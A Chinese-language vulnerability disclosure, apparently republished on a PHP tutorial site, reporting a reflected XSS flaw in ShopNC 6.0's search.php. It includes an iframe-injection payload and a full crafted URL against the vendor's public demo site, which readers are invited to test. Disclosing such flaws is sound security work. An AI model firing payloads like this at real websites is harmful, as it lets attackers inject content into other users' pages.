来源:自学PHP网 时间:2015-04-17 14:46 作者: 阅读:次
[导读] 简要描述:自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击.目前最新版本6.0 存在此问题!详细说明:Search.php页面 对search变量未进行严格过滤,无论是否编码...
|
简要描述:自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击. 目前最新版本6.0 存在此问题! 详细说明:Search.php页面 对search变量未进行严格过滤, 无论是否编码均执行用户url提交的脚本 比如,跨站脚本为
<iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>
如图
目前可以在官方演示站进行测试 http://mall.shopnc.net
http://mall.shopnc.net/search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251</textarea><iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>&sel_goods_brand=&start_price=&txt_class_top_id=0
漏洞证明:都在详细说明中. 修复方案:由于代码是经过Zend加密的,这个问题请等待厂商发布! |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
